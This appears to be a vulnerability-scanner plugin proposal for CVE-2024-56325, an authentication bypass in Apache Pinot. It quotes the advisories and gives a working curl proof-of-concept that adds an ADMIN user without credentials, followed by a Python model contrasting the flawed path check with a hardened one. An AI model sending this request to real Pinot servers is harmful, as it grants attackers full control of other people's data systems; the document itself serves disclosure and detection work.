Description
Hello Tsunami Team
I would like to provide a plugin for CVE-2024-56325 (Apache Pinot Authentication Bypass Issue)
Apache Pinot
Description from the Apache Pinot project website:
Apache Pinot™: The real-time analytics open source platform for lightning-fast insights, effortless scaling, and cost-effective data-driven decisions.
Originally developed at LinkedIn, Apache Pinot™ is a real-time distributed OLAP datastore, purpose-built to provide ultra low-latency analytics at extremely high throughput.
With its distributed architecture and columnar storage, Apache Pinot empowers businesses to gain valuable insights from real-time data, supporting data-driven decision-making and applications.
Vulnerability details
CVSS 3.1 rating (according to ZDI): 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Vulnerability description from the Zero Day Initiative advisory:
This vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system.
Vulnerability description from the Apache Pinot Team, including a PoC:
Apache Pinot: Authentication bypass issue. If the path does not contain / and contains ., authentication is not required.
Expected Normal Request and Response Example
curl -X POST -H "Content-Type: application/json" -d '{"username":"hack2","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}' http://{server_ip}:9000/users
Return:
{"code":401,"error":"HTTP 401 Unauthorized"}
Malicious Request and Response Example
curl -X POST -H "Content-Type: application/json" -d '{"username":"hack","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .
Return:
{"users":{}}
A new user gets added bypassing authentication, enabling the user to control Pinot.
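As an added illustration (this is not code from this issue, from Tsunami, or from Apache Pinot), the Python below models the exemption rule quoted above ("no / and at least one . means skip authentication") and contrasts it with a deny-by-default check. The legacy predicate is a literal model of the advisory's wording, not Pinot's source; the hardened variant, the STATIC_FILES allow-list and all function names are this example's assumptions, not the upstream fix. The sample inputs are constructed; the only one taken from the page is the malicious request target from the PoC.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed allow-list standing in for the files actually shipped in a web UI
# bundle; a real deployment would enumerate its static resource root instead.
STATIC_FILES = {"index.html", "main.js", "styles.css", "favicon.ico"}

# A clean single-segment file name: letters, digits, '_' or '-', one dot, an extension.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.[A-Za-z0-9]+$")


def legacy_is_exempt(path: str) -> bool:
    """Model of the rule the advisory describes (illustrative, not Pinot's code):
    a path with no '/' and at least one '.' is treated as a static asset and
    authentication is skipped. Note that "." alone satisfies it, which is the
    trailing token of the PoC request on this page."""
    return "/" not in path and "." in path


def hardened_is_exempt(raw_target: str, static_files=STATIC_FILES) -> bool:
    """Deny-by-default replacement (an assumption of this example, not the
    upstream fix): normalise first, reject anything that is not a single clean
    file-name segment, then require the name to be a known static file."""
    # Drop query string and fragment, then percent-decode BEFORE any checks so
    # that encoded separators cannot slip past them.
    path = unquote(raw_target.split("?", 1)[0].split("#", 1)[0])
    # Whitespace or ';' (matrix parameters) never belong to a static asset name.
    if any(ch.isspace() or ch == ";" for ch in path):
        return False
    # Collapse '.' and '..' segments; strip the leading '/' so "/main.js" == "main.js".
    norm = posixpath.normpath(path).lstrip("/")
    if "/" in norm or not _SAFE_NAME.match(norm):
        return False
    # Final gate: the name must be something we actually serve unauthenticated.
    return norm in static_files


def classify(targets):
    """Return, per request target, what each rule would decide."""
    return {
        t: {"legacy": legacy_is_exempt(t), "hardened": hardened_is_exempt(t)}
        for t in targets
    }


if __name__ == "__main__":
    # Constructed sample targets plus the PoC target quoted on this page.
    samples = [
        "users",                      # protected API path: both rules require auth
        "index.html",                 # genuine static asset: both rules exempt it
        ".",                          # satisfies the legacy rule, rejected by the hardened one
        "/index.html?v=2",            # query string and leading '/' are normalised away
        "%2e%2e/index.html",          # percent-decoded before checking, then rejected
        "users; http://{serverip}:9000/users; .",  # the PoC target from the page
    ]
    for target, verdict in classify(samples).items():
        print(f"{target!r:45} legacy_exempt={verdict['legacy']!s:5} hardened_exempt={verdict['hardened']}")
```

The design point is that an authentication filter should never decide "this is public" from a loose shape test on the raw request string; it should normalise, enforce a strict grammar for what a static asset name may look like, and fall back to requiring authentication for everything else. The hardened function here also demonstrates why percent-decoding must happen before, not after, the separator checks.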